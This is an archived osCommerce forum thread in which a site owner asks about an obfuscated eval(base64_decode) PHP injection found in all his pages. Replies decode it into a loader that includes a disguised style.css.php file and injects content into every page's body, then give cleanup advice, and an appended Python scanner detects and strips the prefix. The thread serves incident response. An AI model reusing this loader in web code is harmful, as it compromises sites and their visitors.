Guest Posted May 21, 2009

I have this code at the top of all my pages:

    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb250ZW50L3kvby9nL3lvZ 2ljY2hhaS9odG1sL2NhdGFsb2cveW9naWNjaGFpL2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvdGlueV 9tY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxlLmNzcy5waHA nKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9jb250ZW50L3kvby9nL3lvZ2ljY2hhaS9odG1sL2NhdGFsb2cv eW9naWNjaGFpL2FkbWluL2luY2x1ZGVzL2phdmFzY3JpcHQvdGlueV9tY2UvcGx1Z2lucy9pbmxpbmVwb 3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdH MoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemR lY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZCl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDsk ZT0wO2lmKCRmJjQpeyRlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9MiskZ Tt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMTYpeyRoPXN0cnBvcygkZC xjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWY oJHU9PT1GQUxTRSl7JHU9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0Nv bnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJlZ19tYXRjaCgnL1w8Ym9ke S9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbW woKSwkYyk7fWVsc2V7cmV0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

1) What is it?
2) How was someone able to do that?
3) How can I delete it all at once without having to delete it from each file?
4) How can I prevent this from happening again?

Thank you for your help!
Ricardo

♥FWR Media Posted May 21, 2009

What is it? It's nasty, that's what .. the actual code is below:

    if ( function_exists('ob_start') && !isset($GLOBALS['sh_no']) ) {
      $GLOBALS['sh_no'] = 1;
      if ( file_exists('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php') ) {
        include_once('/home/content/y/o/g/yogicchai/html/catalog/yogicchai/admin/includes/javascript/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');
        if ( function_exists('gml') && !function_exists('dgobh') ) {
          // Fallback gzdecode(): skip the gzip header fields, then inflate
          if ( !function_exists('gzdecode') ) {
            function gzdecode($d) {
              $f = ord(substr($d, 3, 1));
              $h = 10; $e = 0;
              if ($f & 4) {
                $e = unpack('v', substr($d, 10, 2));
                $e = $e[1]; $h += 2 + $e;
              }
              if ($f & 8) {
                $h = strpos($d, chr(0), $h) + 1;
              }
              if ($f & 16) {
                $h = strpos($d, chr(0), $h) + 1;
              }
              if ($f & 2) {
                $h += 2;
              }
              $u = gzinflate(substr($d, $h));
              if ($u === FALSE) {
                $u = $d;
              }
              return $u;
            }
          }
          // Output callback: put the result of gml() right after <body>, or prepend it
          function dgobh($b) {
            Header('Content-Encoding: none');
            $c = gzdecode($b);
            if (preg_match('/\<body/si', $c)) {
              return preg_replace('/(\<body[^\>]*\>)/si', '$1'.gml(), $c);
            } else {
              return gml().$c;
            }
          }
          // Route all page output through dgobh()
          ob_start('dgobh');
        }
      }
    }

Guest Posted May 21, 2009

Robert, thanks for your reply. Could you tell me what to do now? Should I remove the inline popups file from the admin dir, and then change my FTP password? Any other suggestion will be greatly appreciated.

RhinoFish Posted May 21, 2009

see here for things to do when you've been hacked: http://www.oscommerce.com/forums/index.php?showtopic=313323

RhinoFish Posted May 21, 2009

some more here, but more about back end database security: http://www.oscommerce.com/forums/index.php?showtopic=310524

Guest Posted May 21, 2009

I need to know how to clean that F#$@$ code out of all my files. Is there a way to do it at once, or do I have to go one by one and delete the code? Should I install Security Pro afterwards, or before I start deleting the code just in case it comes back again? How was this hacker able to add that code to all my files?

♥geoffreywalton Posted May 21, 2009

See the reasons in the links above for the most likely ways in. Set the permissions on files and directories right. Restoring the site from a clean backup is the best solution, or edit every file and remove the offending code.

diy Posted May 21, 2009

Usually people say that you have to install a clean backup (of the files), and because chances are that the hacker will come back, you have to secure the site - afterwards!!

Guest Posted May 21, 2009

Ok guys, thank you for your help. I will upload the clean files from my backup and then add the Security Pro contribution as well as any others mentioned above. Again, thanks!

Guest Posted May 22, 2009

this infection does the following:
- adds a gifimg.php (or similarly named file) to most/all of your image directories
- adds a javascript function to many index.htm or index.html files on your site
- adds a javascript function to many .js files on your site.

FYI.
-jared

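Added example, not part of the original thread or any poster's code: a read-only Python scan for the injected `eval(base64_decode(...))` prefix shown in the first post and for PHP files sitting in image directories, as described in the last post. The directory names in `IMAGE_DIRS` and the sample tree built by `demo()` are assumptions constructed for the demonstration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Injected prefix from the first post: <?php /**/eval(base64_decode('...')); ?>
INJECT_RE = re.compile(
    rb"<\?php\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=\s]+)'\)\);\s*\?>")
IMAGE_DIRS = {"images", "img"}  # assumption: names of the site's image directories


def scan_tree(root):
    """Return (injected, stray) findings; nothing is executed or modified."""
    injected, stray = [], []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        # A PHP file inside an image directory is suspicious on its own.
        if path.suffix == ".php" and IMAGE_DIRS & set(rel.parent.parts):
            stray.append(rel.as_posix())
        m = INJECT_RE.search(path.read_bytes())
        if m:
            # Decode for inspection only; whitespace inside the blob is dropped.
            payload = base64.b64decode(b"".join(m.group(1).split()))
            injected.append((rel.as_posix(), payload.decode("latin-1")))
    return injected, stray


def strip_injection(data):
    """Return file content with the injected prefix removed."""
    return INJECT_RE.sub(b"", data)


def demo():
    """Build a constructed sample tree, scan it, and strip one infected file."""
    blob = base64.b64encode(b"/* constructed stand-in payload */")
    bad = b"<?php /**/eval(base64_decode('" + blob + b"')); ?><?php echo 'shop'; ?>\n"
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "images").mkdir()
        (root / "index.php").write_bytes(bad)
        (root / "clean.php").write_bytes(b"<?php echo 'ok'; ?>\n")
        (root / "images" / "gifimg.php").write_bytes(b"<?php /* constructed */ ?>\n")
        return scan_tree(root), strip_injection(bad)


if __name__ == "__main__":
    print(demo())
```

Stripping the prefix does not remove the dropped `style.css.php` include or any other file the intruder left behind, which is why the replies above recommend restoring from a clean backup.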
This topic is now archived and is closed to further replies.